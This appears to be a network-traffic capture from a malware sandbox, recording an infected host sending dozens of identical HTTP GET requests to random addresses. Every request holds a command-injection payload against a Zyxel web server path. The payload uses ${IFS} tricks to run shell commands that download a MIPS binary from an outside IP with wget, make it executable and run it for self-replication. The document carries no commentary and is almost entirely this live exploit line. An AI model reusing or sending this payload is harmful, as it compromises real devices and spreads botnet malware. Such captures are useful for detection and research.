                                                        Feb 2, 2024 06:21:10.946129084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4604192.168.2.145035272.12.239.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946183920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4605192.168.2.1451244192.129.7.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946234941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4606192.168.2.144516280.192.77.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946260929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4607192.168.2.1443128192.136.52.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946316004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4608192.168.2.1445554196.107.235.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946343899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4609192.168.2.1455558219.217.239.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946389914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4610192.168.2.1434576132.6.17.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946424961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4611192.168.2.144116257.3.245.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946460962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4612192.168.2.1449142185.14.235.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946496964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4613192.168.2.1441748162.223.78.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946551085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4614192.168.2.144337686.65.48.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946584940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4615192.168.2.14535482.254.106.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946628094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4616192.168.2.1448784110.131.230.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946660995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4617192.168.2.1446376179.195.108.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946702957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4618192.168.2.1436350216.20.174.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946739912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4619192.168.2.145693627.86.9.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946778059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4620192.168.2.1443568107.62.165.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946831942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4621192.168.2.145263659.249.176.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946866989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4622192.168.2.1442710141.182.95.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946897030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4623192.168.2.1454980108.182.184.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946923971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4624192.168.2.1435072142.174.87.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.946958065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4625192.168.2.1437414122.31.180.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947027922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4626192.168.2.145478451.211.59.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947045088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4627192.168.2.1451876199.2.4.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947104931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4628192.168.2.1433676151.26.194.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947149992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4629192.168.2.145213613.249.235.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947189093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4630192.168.2.145313649.109.18.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947307110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4631192.168.2.146092823.222.190.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947350025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4632192.168.2.145542893.100.103.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947401047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4633192.168.2.143673639.210.20.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947438955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4634192.168.2.1437190199.159.7.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947477102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4635192.168.2.1441460183.24.136.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947510004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4636192.168.2.1437784209.30.184.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947571993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4637192.168.2.1451808146.216.227.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947622061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4638192.168.2.1449382172.74.195.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947666883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4639192.168.2.1455276205.186.101.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947710037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4640192.168.2.1439522192.99.53.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947746992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4641192.168.2.1449138203.227.189.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947809935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4642192.168.2.1436474112.249.64.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947853088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4643192.168.2.1437124174.78.44.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947876930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4644192.168.2.145146271.26.109.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947927952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4645192.168.2.1441464157.50.230.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.947968960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4646192.168.2.145204073.185.192.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948018074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4647192.168.2.1458744161.50.95.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948056936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4648192.168.2.144458070.228.145.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948095083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4649192.168.2.143546896.36.25.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948123932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4650192.168.2.145008823.199.149.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948183060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4651192.168.2.1448654118.87.127.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948216915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4652192.168.2.1450346221.129.188.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948273897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4653192.168.2.1442192165.78.220.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948292971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4654192.168.2.146086036.178.251.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948333979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4655192.168.2.144809020.37.139.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948398113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4656192.168.2.1437132151.0.48.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948443890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4657192.168.2.145214427.71.66.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948482990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4658192.168.2.143738496.203.107.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948508024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4659192.168.2.1443560168.22.98.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948564053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4660192.168.2.143652899.6.88.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948597908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4661192.168.2.145484442.25.125.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948636055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4662192.168.2.1451708187.185.22.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948667049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4663192.168.2.144332051.97.134.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948739052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4664192.168.2.1439706123.81.54.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948772907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4665192.168.2.1444910105.88.168.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:10.948787928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4666192.168.2.1437500145.163.110.86443
                                                        TimestampBytes transferredDirectionData
